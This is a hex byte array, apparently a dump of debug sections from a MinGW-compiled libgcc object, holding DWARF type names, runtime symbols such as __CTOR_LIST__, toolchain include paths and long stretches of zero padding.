,0x64 ,0x00 ,0x02 ,0x08 ,0x03 ,0x63 ,0x6f ,0x6d ,0x70 ,0x6c ,0x65 ,0x78 ,0x20 ,0x66 ,0x6c ,0x6f ,0x61 ,0x74 ,0x00 ,0x02 ,0x10 ,0x03 ,0x63 ,0x6f ,0x6d ,0x70 ,0x6c ,0x65 ,0x78 ,0x20 ,0x64 ,0x6f ,0x75 ,0x62 ,0x6c ,0x65 ,0x00 ,0x02 ,0x20 ,0x03 ,0x63 ,0x6f ,0x6d ,0x70 ,0x6c ,0x65 ,0x78 ,0x20 ,0x6c ,0x6f ,0x6e ,0x67 ,0x20 ,0x64 ,0x6f ,0x75 ,0x62 ,0x6c ,0x65 ,0x00 ,0x02 ,0x10 ,0x04 ,0x5f ,0x46 ,0x6c ,0x6f ,0x61 ,0x74 ,0x31 ,0x32 ,0x38 ,0x00 ,0x02 ,0x20 ,0x03 ,0x63 ,0x6f ,0x6d ,0x70 ,0x6c ,0x65 ,0x78 ,0x20 ,0x5f ,0x46 ,0x6c ,0x6f ,0x61 ,0x74 ,0x31 ,0x32 ,0x38 ,0x00 ,0x08 ,0xa9 ,0x1d ,0x00 ,0x00 ,0x3b ,0x1e ,0x00 ,0x00 ,0x09 ,0x12 ,0x01 ,0x00 ,0x00 ,0xff ,0x00 ,0x03 ,0x2b ,0x1e ,0x00 ,0x00 ,0x0a ,0x5f ,0x5f ,0x70 ,0x6f ,0x70 ,0x63 ,0x6f ,0x75 ,0x6e ,0x74 ,0x5f ,0x74 ,0x61 ,0x62 ,0x00 ,0x0b ,0xfc ,0x01 ,0x16 ,0x3b ,0x1e ,0x00 ,0x00 ,0x0a ,0x5f ,0x5f ,0x63 ,0x6c ,0x7a ,0x5f ,0x74 ,0x61 ,0x62 ,0x00 ,0x0b ,0x02 ,0x02 ,0x16 ,0x3b ,0x1e ,0x00 ,0x00 ,0x04 ,0x66 ,0x75 ,0x6e ,0x63 ,0x5f ,0x70 ,0x74 ,0x72 ,0x00 ,0x0c ,0x2a ,0x10 ,0x12 ,0x02 ,0x00 ,0x00 ,0x08 ,0x6b ,0x1e ,0x00 ,0x00 ,0x87 ,0x1e ,0x00 ,0x00 ,0x10 ,0x00 ,0x06 ,0x5f ,0x5f ,0x43 ,0x54 ,0x4f ,0x52 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x0c ,0x2f ,0x11 ,0x7c ,0x1e ,0x00 ,0x00 ,0x06 ,0x5f ,0x5f ,0x44 ,0x54 ,0x4f ,0x52 ,0x5f ,0x4c ,0x49 ,0x53 ,0x54 ,0x5f ,0x5f ,0x00 ,0x0c ,0x30 ,0x11 ,0x7c ,0x1e ,0x00 ,0x00 ,0x18 ,0x87 ,0x1e ,0x00 ,0x00 ,0x0d ,0x39 ,0x09 ,0x0a ,0x09 ,0x03 ,0xd0 ,0x2a ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x18 ,0x9d ,0x1e ,0x00 ,0x00 ,0x0d ,0x3a ,0x09 ,0x0a ,0x09 ,0x03 ,0xe8 ,0x2a ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x01 ,0x11 ,0x00 ,0x10 ,0x06 ,0x11 ,0x01 ,0x12 ,0x01 ,0x03 ,0x0e ,0x1b ,0x0e ,0x25 ,0x0e ,0x13 ,0x05 ,0x00 ,0x00 ,0x00 ,0x01 ,0x11 ,0x01 ,0x25 ,0x08 ,0x13 ,0x0b ,0x03 ,0x08 ,0x1b ,0x08 ,0x10 ,0x17 ,0x00 ,0x00 ,0x02 ,0x24 ,0x00 ,0x0b ,0x0b ,0x3e ,0x0b ,0x03 ,0x08 ,0x00 ,0x00 ,0x03 ,0x26 ,0x00 ,0x49 ,0x13 ,0x00 ,0x00 ,0x04 ,0x16 ,0x00 ,0x03 ,0x08 ,0x3a ,0x0b ,0x3b ,0x0b ,0x39 ,0x0b ,0x49 ,0x13 ,0x00 ,0x00 ,0x05 ,0x0f ,0x00 ,0x0b ,0x0b ,0x49 ,0x13 ,0x00 ,0x00 ,0x06 ,0x34 ,0x00 ,0x03 ,0x08 ,0x3a ,0x0b ,0x3b ,0x0b ,0x39 ,0x0b ,0x49 ,0x13 ,0x3f ,0x19 ,0x3c ,0x19 ,0x00 ,0x00 ,0x07 ,0x15 ,0x00 ,0x27 ,0x19 ,0x00 ,0x00 ,0x08 ,0x01 ,0x01 ,0x49 ,0x13 ,0x01 ,0x13 ,0x00 ,0x00 ,0x09 ,0x21 ,0x00 ,0x49 ,0x13 ,0x2f ,0x0b ,0x00 ,0x00 ,0x0a ,0x34 ,0x00 ,0x03 ,0x08 ,0x3a ,0x0b ,0x3b ,0x05 ,0x39 ,0x0b ,0x49 ,0x13 ,0x3f ,0x19 ,0x3c ,0x19 ,0x00 ,0x00 ,0x0b ,0x15 ,0x01 ,0x27 ,0x19 ,0x49 ,0x13 ,0x01 ,0x13 ,0x00 ,0x00 ,0x0c ,0x05 ,0x00 ,0x49 ,0x13 ,0x00 ,0x00 ,0x0d ,0x26 ,0x00 ,0x00 ,0x00 ,0x0e ,0x04 ,0x01 ,0x03 ,0x08 ,0x3e ,0x0b ,0x0b ,0x0b ,0x49 ,0x13 ,0x3a ,0x0b ,0x3b ,0x0b ,0x39 ,0x0b ,0x01 ,0x13 ,0x00 ,0x00 ,0x0f ,0x28 ,0x00 ,0x03 ,0x08 ,0x1c ,0x0b ,0x00 ,0x00 ,0x10 ,0x21 ,0x00 ,0x00 ,0x00 ,0x11 ,0x13 ,0x01 ,0x03 ,0x08 ,0x0b ,0x0b ,0x3a ,0x0b ,0x3b ,0x0b ,0x39 ,0x0b ,0x01 ,0x13 ,0x00 ,0x00 ,0x12 ,0x0d ,0x00 ,0x03 ,0x08 ,0x3a ,0x0b ,0x3b ,0x0b ,0x39 ,0x0b ,0x49 ,0x13 ,0x38 ,0x0b ,0x00 ,0x00 ,0x13 ,0x13 ,0x01 ,0x03 ,0x08 ,0x0b ,0x05 ,0x3a ,0x0b ,0x3b ,0x0b ,0x39 ,0x0b ,0x01 ,0x13 ,0x00 ,0x00 ,0x14 ,0x0d ,0x00 ,0x03 ,0x08 ,0x3a ,0x0b ,0x3b ,0x05 ,0x39 ,0x0b ,0x49 ,0x13 ,0x38 ,0x0b ,0x00 ,0x00 ,0x15 ,0x0d ,0x00 ,0x03 ,0x08 ,0x3a ,0x0b ,0x3b ,0x05 ,0x39 ,0x0b ,0x49 ,0x13 ,0x38 ,0x05 ,0x00 ,0x00 ,0x16 ,0x04 ,0x01 ,0x03 ,0x08 ,0x3e ,0x0b ,0x0b ,0x0b ,0x49 ,0x13 ,0x3a ,0x0b ,0x3b ,0x05 ,0x39 ,0x0b ,0x01 ,0x13 ,0x00 ,0x00 ,0x17 ,0x17 ,0x00 ,0x03 ,0x08 ,0x3c ,0x19 ,0x00 ,0x00 ,0x18 ,0x34 ,0x00 ,0x47 ,0x13 ,0x3a ,0x0b ,0x3b ,0x05 ,0x39 ,0x0b ,0x02 ,0x18 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x77 ,0x00 ,0x00 ,0x00 ,0x02 ,0x00 ,0x4f ,0x00 ,0x00 ,0x00 ,0x01 ,0x01 ,0xfb ,0x0e ,0x0d ,0x00 ,0x01 ,0x01 ,0x01 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x01 ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x73 ,0x72 ,0x63 ,0x2f ,0x67 ,0x63 ,0x63 ,0x2d ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x2f ,0x6c ,0x69 ,0x62 ,0x67 ,0x63 ,0x63 ,0x2f ,0x63 ,0x6f ,0x6e ,0x66 ,0x69 ,0x67 ,0x2f ,0x69 ,0x33 ,0x38 ,0x36 ,0x00 ,0x00 ,0x63 ,0x79 ,0x67 ,0x77 ,0x69 ,0x6e ,0x2e ,0x53 ,0x00 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x09 ,0x02 ,0x30 ,0x27 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x03 ,0xf4 ,0x00 ,0x01 ,0x22 ,0x22 ,0x67 ,0x59 ,0x30 ,0x75 ,0x4b ,0x67 ,0x67 ,0x30 ,0x3d ,0x4c ,0x22 ,0x22 ,0x02 ,0x01 ,0x00 ,0x01 ,0x01 ,0xa3 ,0x01 ,0x00 ,0x00 ,0x02 ,0x00 ,0x9d ,0x01 ,0x00 ,0x00 ,0x01 ,0x01 ,0xfb ,0x0e ,0x0d ,0x00 ,0x01 ,0x01 ,0x01 ,0x01 ,0x00 ,0x00 ,0x00 ,0x01 ,0x00 ,0x00 ,0x01 ,0x43 ,0x3a ,0x2f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x38 ,0x31 ,0x30 ,0x2f ,0x78 ,0x38 ,0x36 ,0x5f ,0x36 ,0x34 ,0x2d ,0x38 ,0x31 ,0x30 ,0x2d ,0x70 ,0x6f ,0x73 ,0x69 ,0x78 ,0x2d ,0x73 ,0x65 ,0x68 ,0x2d ,0x72 ,0x74 ,0x5f ,0x76 ,0x36 ,0x2d ,0x72 ,0x65 ,0x76 ,0x30 ,0x2f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x36 ,0x34 ,0x2f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x2f ,0x69 ,0x6e ,0x63 ,0x6c ,0x75 ,0x64 ,0x65 ,0x00 ,0x43 ,0x3a ,0x2f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x38 ,0x31 ,0x30 ,0x2f ,0x73 ,0x72 ,0x63 ,0x2f ,0x67 ,0x63 ,0x63 ,0x2d ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x2f ,0x69 ,0x6e ,0x63 ,0x6c ,0x75 ,0x64 ,0x65 ,0x00 ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2f ,0x67 ,0x63 ,0x63 ,0x00 ,0x43 ,0x3a ,0x2f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x38 ,0x31 ,0x30 ,0x2f ,0x73 ,0x72 ,0x63 ,0x2f ,0x67 ,0x63 ,0x63 ,0x2d ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x2f ,0x67 ,0x63 ,0x63 ,0x2f ,0x63 ,0x6f ,0x6e ,0x66 ,0x69 ,0x67 ,0x2f ,0x69 ,0x33 ,0x38 ,0x36 ,0x00 ,0x43 ,0x3a ,0x2f ,0x6d ,0x69 ,0x6e ,0x67 ,0x77 ,0x38 ,0x31 ,0x30 ,0x2f ,0x73 ,0x72 ,0x63 ,0x2f ,0x67 ,0x63 ,0x63 ,0x2d ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x2f ,0x6c ,0x69 ,0x62 ,0x67 ,0x63 ,0x63 ,0x00 ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x2e ,0x2e ,0x2f ,0x73 ,0x72 ,0x63 ,0x2f ,0x67 ,0x63 ,0x63 ,0x2d ,0x38 ,0x2e ,0x31 ,0x2e ,0x30 ,0x2f ,0x6c ,0x69 ,0x62 ,0x67 ,0x63 ,0x63 ,0x00 ,0x00 ,0x63 ,0x72 ,0x74 ,0x64 ,0x65 ,0x66 ,0x73 ,0x2e ,0x68 ,0x00 ,0x01 ,0x00 ,0x00 ,0x73 ,0x74 ,0x64 ,0x6c ,0x69 ,0x62 ,0x2e ,0x68 ,0x00 ,0x01 ,0x00 ,0x00 ,0x6d ,0x61 ,0x6c ,0x6c ,0x6f ,0x63 ,0x2e ,0x68 ,0x00 ,0x01 ,0x00 ,0x00 ,0x70 ,0x72 ,0x6f ,0x63 ,0x65 ,0x73 ,0x73 ,0x2e ,0x68 ,0x00 ,0x01 ,0x00 ,0x00 ,0x67 ,0x65 ,0x74 ,0x6f ,0x70 ,0x74 ,0x2e ,0x68 ,0x00 ,0x02 ,0x00 ,0x00 ,0x74 ,0x69 ,0x6d ,0x65 ,0x2e ,0x68 ,0x00 ,0x01 ,0x00 ,0x00 ,0x68 ,0x61 ,0x73 ,0x68 ,0x74 ,0x61 ,0x62 ,0x2e ,0x68 ,0x00 ,0x02 ,0x00 ,0x00 ,0x69 ,0x6e ,0x73 ,0x6e ,0x2d ,0x63 ,0x6f ,0x6e ,0x73 ,0x74 ,0x61 ,0x6e ,0x74 ,0x73 ,0x2e ,0x68 ,0x00 ,0x03 ,0x00 ,0x00 ,0x69 ,0x33 ,0x38 ,0x36 ,0x2e ,0x68 ,0x00 ,0x04 ,0x00 ,0x00 ,0x69 ,0x33 ,0x38 ,0x36 ,0x2d ,0x6f ,0x70 ,0x74 ,0x73 ,0x2e ,0x68 ,0x00 ,0x04 ,0x00 ,0x00 ,0x6c ,0x69 ,0x62 ,0x67 ,0x63 ,0x63 ,0x32 ,0x2e ,0x68 ,0x00 ,0x05 ,0x00 ,0x00 ,0x67 ,0x62 ,0x6c ,0x2d ,0x63 ,0x74 ,0x6f ,0x72 ,0x73 ,0x2e ,0x68 ,0x00 ,0x05 ,0x00 ,0x00 ,0x6c ,0x69 ,0x62 ,0x67 ,0x63 ,0x63 ,0x32 ,0x2e ,0x63 ,0x00 ,0x06 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x14 ,0x00 ,0x00 ,0x00 ,0xff ,0xff ,0xff ,0xff ,0x01 ,0x00 ,0x01 ,0x78 ,0x20 ,0x0c ,0x07 ,0x08 ,0xa0 ,0x01 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x2c ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x30 ,0x27 ,0xcc ,0x68 ,0x00 ,0x00 ,0x00 ,0x00 ,0x32 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x41 ,0x0e ,0x10 ,0x82 ,0x02 ,0x41 ,0x0e ,0x18 ,0x80 ,0x03 ,0x6e ,0x0e ,0x10 ,0xc0 ,0x41 ,0x0e ,0x08 ,0xc2 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 ,0x00 